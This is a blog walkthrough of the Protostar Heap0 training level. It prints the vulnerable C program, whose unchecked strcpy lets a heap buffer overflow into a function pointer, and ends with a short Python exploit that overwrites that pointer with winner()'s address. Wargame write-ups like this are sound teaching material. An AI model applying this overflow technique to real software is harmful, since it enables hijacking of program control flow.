Binary Exploitation Protostar Heap0 - Walkthrough - Writeups

Hello Guyz,



Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Heap0 Level.

In This Level, Our Task Is to Execute Winner Function Through Heap Overflow Concept.


Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb
  • Do Some Research About Heap overflow exploitation.

Source Code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct data {
  char name[64];
};

struct fp {
  int (*fp)();
};

void winner()
{
  printf("level passed\n");
}

void nowinner()
{
  printf("level has not been passed\n");
}

int main(int argc, char **argv)
{
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);
  
  f->fp();

}

Hint

This level introduces heap overflows and how they can influence code flow.

This level is at /opt/protostar/bin/heap0

Code Review

  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));   <--- Locating Space For data struct
  f = malloc(sizeof(struct fp));     <--- Locating Space For Fp Struct Just After The Data Struct.
  f->fp = nowinner;                  <--- Assign Nowinner Function Pointer To FP Struct

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);          <--- No Input Size verification. 
  
  f->fp();                           <--- Calling Inner function
  
  

Plan

As You Can See, In Source Code Their Is Nothing To Verify User Input. Hence, We can Easily Heap Overflow And Write Winner Function Address.

Implementation

  Heap Overview
 -------------------------------
 | Name[64]              | FP  |
 -------------------------------
  
  Overflow Name And Write Data To FP

Exploit

#!/usr/bin/python
import struct
# /opt/protostar/bin/heap0 $(python exploit.py)

buf = "a"*72
win = 0x08048464
ret = struct.pack("I",win)


payload = ''
payload+= buf
payload+= ret
print payload

For More Detailed Walk through Check Below Provided YouTube Video Playlist



Share this

Related Posts

Previous
Next Post »